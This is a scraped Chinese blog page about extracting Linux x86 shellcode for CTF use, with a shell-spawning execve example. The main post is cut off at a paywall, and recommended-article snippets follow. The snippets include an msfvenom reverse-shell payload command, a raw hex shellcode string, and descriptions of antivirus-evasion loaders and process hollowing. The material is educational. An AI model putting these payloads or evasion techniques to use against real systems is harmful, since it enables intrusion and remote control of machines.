记一次shellcode提取经历

最新推荐文章于 2024-08-22 18:24:23 发布
最新推荐文章于 2024-08-22 18:24:23 发布
阅读量3.3k 收藏
点赞数 2
分类专栏: ctf 文章标签: shell c语言 汇编
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29343201/article/details/52209935
版权

前言

闲来无事,以前都是去exploit-db找shellcode使用,但是有的时候似乎并不那么顺利,找到了之后却由于一些问题(比如之前有一次,要求shellcode里边不能出现0b和0c之类制表符,否则会提前中断,但是一些打开shell的shellcode基本都有),想到如果自己掌握了提取方法,或许以后会方便一点,根据自己的要求进行一些更改或者调整指令,为此还专门学习了一下内联汇编的使用(发现并没有什么太大的用处)。

大致思路

由于我只是进行一下shellcode提取的实验,主要目的是获得一个可以打开shell的shellcode,暂时不考虑简短性通用性等问题,只要达到目的即可,基本思路,是使用execve系统调用来打开一个shell。

系统调用?

首先说一下系统调用,系统调用是linux交流用户空间和内核空间的一个“通道”,用户应用程序通过系统调用可以得到一些只有内核才能够提供的功能。调用系统调用的方法为使用int 0x80汇编语句,也就是0x80号中断来进行,而系统调用又要涉及到参数传递规则和一般函数的不同:系统调用通过寄存器传参,eax代表调用号,然后ebx,ecx,edx等依次为系统调用所需要的参数1,参数2,参数三等

我们需要用到的execve系统调用的原型为:

int execve(
最低0.47元/天 解锁文章
Anciety
关注
专栏目录
rust-windows-shellcode:Rust中的Windows Shellcode开发
03-05
用Rust编写Windows Shellcode 项目概况 Windows shellcode项目位于shellcode/ ,它可以构建为仅包含.text节的PE文件,并且没有外部依赖项。 然后,我们可以转储.text节并进行一些修补以使其与位置无关。 这个想法来自的项目 。 如何建造 (仅在Win10 x64上测试过) 构建shellcode二进制文件 rustup default nightly-x86_64-pc-windows-msvc cd shellcode/ cargo build --release 如果一切顺利,我们将获得shellcode\target\x86_64-pc-windows-msvc\release\shellcode.exe 转储.text部分并做一些补丁 我们在.text部分的开头打补丁,使其跳转到入口点。 这样,我们可以在合并部分中存储一些字符串
网络攻防技术-Lab5-shellcode编写实验(SEED Labs – Shellcode Development Lab)
fgdhf的博客
10-30 2406
​ 网络攻防技术实验,实验环境、实验说明、实验代码见 Shellcode Development Lab。Task 2: Using Code Segment。网络攻防技术 Lab5 shellcode编写实验 SEED Labs – Shellcode Development Lab ​
[CTF]-Pwn:shellcode题型综合解析
最新发布
2301_79326813的博客
08-22 853
先看保护再看ida有一个不限长度的输入点gets,那能干的就很多了。通俗易懂的思路有以下两种解法一(系统调用):解题思路:主要是利用gets函数先往任意可用的bss段来输入/bin/sh,这样我们进行系统调用才有参数,然后就可以再次输入进行系统调用execve。补充点1:32位系统调用传参的寄存器顺序是ebx,ecx,edx等,eax用于存放系统调用号补充点2:用ROPgadget找出的sh字符好像用不了,反正我尝试了一下,没法用,所以就自己往bss段写入/bin/sh了。
利用 exploit-db 交叉编译 shellcode
YouTheFreedom的博客
09-22 593
shellcode 通用编写方法 获得shellcode一般有如下五种办法: pwntools: asm(shellcraft.arm.linux.sh(),arch=’arm’) msfvenom: msfvenom -p linux/armle/shell/reverse_tcp LHOST=192.168.1.100 LPORT=6666 -f py -o msf.py shell-storm: http://shell-storm.org/shellcode/ exploit-db: https
python免杀基础之shellcode调用
dzqxwzoe的博客
08-23 1402
shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。(摘自百度)在windows中, 如果想要调用shellcode, 那肯定逃不过win32 api的调用, 如果会汇编的话那就另说了。那在这里介绍一下常用的API。函数需要查询MSDN去了解, 需要有点win32编程基础。
Python shellcode免杀
qq_25761407的博客
04-02 5600
Python shellcode免杀
Shellcode-Extractor:Python脚本从Linux可执行文件中提取Shellcode
05-18
ShellcodeExtractor SHELLCODE-EXTRACTOR工具,用于从对象/二进制文件中提取shellcode和长度。 版权所有(C)2017 Neetx 该文件是Shellcode-Extractor的一部分。 Shellcode-Extractor是免费软件:您可以根据自由软件...
rs_shellcode:另一个shellcode运行器
05-23
rs-shellcode 在Rust中编写的shellcode运行器使用 。 如何使用它 安装 ,使用每晚toochain。 rustup default nightly 使用msfvenom生成shellcode进行测试。 msfvenom -p windows/x64/exec CMD=calc.exe --...
一款开源的ShellCode生成引擎
11-29
1.本工具只支持x86 coff格式的文件 2.全局变量得初始化,测试的时候发现有事全局变量没有初始化会获取不到 3.关闭MSVC的全局优化,开启全局优化时OBJ中的信息无法获取 4.不要在代码中使用c++一些特性,类似异常等...
最短shellcode提取方法和测试【原创】
12-13
本篇文章将详细探讨“最短shellcode提取方法”以及如何在Windows XP SP3环境下测试它。 首先,shellcode的长度至关重要,因为更短的shellcode可以更容易地隐藏在漏洞利用中,避免被安全软件检测到。在提供的描述中...
Custom Shellcode
05-16
Custom Shellcode 代码参考.
python加载shellcode免杀 简介
whatday的专栏
10-02 4796
前言 本文整理自小迪师傅近期课程以及本人实验时所踩的一些坑和思路。文章由浅入深,可以让你从免杀小白到免杀入门者,能够绕过火绒和360等国内主流安全软件,成功上线msf。本人也是刚接触免杀,若有说得不对的地方,欢迎大佬们及时提出指正。关于本人在实验过程中所踩的一些坑会在文中提醒大家,让大家尽量少入坑。 注:以下实验截图均为本人发稿时重新测试所截 0X00 基础概念 1. python ctypes模块介绍 ctypes是 Python的外部函数库。它提供了与 C 兼容的数据类型,并允许调用 D...
python渗透测试入门之shellcode
ailx10
06-26 1058
近期收到了电子工业出版社赠送的一本网络安全书籍《python黑帽子》,书中一共24个实验,今天复现第21个实验( shellcode),我的测试环境是windows10虚拟机(32位)+kali虚拟机+conda开发环境+python3.7+MSF框架。过程有点曲折,因为是32位windows环境,因为之前实验导致自己电脑坏了,我从vitualbox虚拟机更换成了vmware虚拟机,顺利完成本次实...
使用Rust编写Windows Shellcode:简洁与效率的完美结合
gitblog_00095的博客
05-28 598
使用Rust编写Windows Shellcode:简洁与效率的完美结合 项目地址:https://gitcode.com/b1tg/rust-windows-shellcode 项目简介 这个开源项目是一个创新的方式,它允许你在Rust中编写Windows Shellcode,最终编译成一个PE文件,仅包含.text节区且没有外部依赖。通过这个项目,你可以体验到Rust语言的安全性与Shellc...
Rust免杀 Shellcode加载与混淆
stopluox的博客
09-19 212
下面是实现AES-CFB加解密的代码,在加密的函数中最终返回的是Hex编码后的字符串,而解密函数最终返回的是Vec数组,同样是为了方便在shellcode loader中读取加密后的shellcode以及加载解密后的shellcode。下面是实现RC4加解密的代码,在加密的函数中最终返回的是Base64编码后的字符串,而解密函数最终返回的是Vec数组,这是为了方便在shellcode loader中读取加密后的shellcode以及加载解密后的shellcode
Python-shellcode免杀分离
m0_63917373的博客
06-01 2787
shellcode免杀
C语言实现shellcode通用框架二:文件下载执行或内存加载
yan_star的博客
01-21 1211
简介: 承接接上篇。上篇(C语言实现shellcode通用框架一:解密执行)我们的第二层shellcode核心代码都是事先加密好嵌套在第一层shellcode中,核心代码更新起来不方便。所以联网更新显得尤为重要。大家可以选择内存加载,这样可以避免落地被杀软查杀,也可以选择落地,随意选择,思想和代码很重要。其实,这篇介绍的shellcode框架代码和上篇大同小异,无非是API、动态库多了一些,代码量有所变大,但是核心思想,代码逻辑还是一样的。开下源,希望对大家学习有所帮助。关于内存加载那块我注释并标出了,使
使用进程镂空技术免杀360Defender
ss810540895的博客
07-11 782
风暴免杀实现了进程注入和进程镂空技术以达到隐匿和免杀的效果,进程注入是利用windows API在目标进程中申请一块内存,然后将shellcode直接注入其中并创建线程运行,恶意的shellcode直接运行在目标程序内,结合运行后删除自身/从网络加载shellcode等方式,具备非常好的隐匿效果,目前测试只能稳定注入到explorer.exe进程中。通过hook技术可以实现对任意程序的监控,可以监视木马程序的行为,监控关键API调用等,于是出现了主动防御、沙箱等查杀技术。
写一段shellcode
09-05
这是一个简单的 shellcode,它会在 Linux 系统上打开一个终端窗口: ``` \x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80 ``` 这段 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值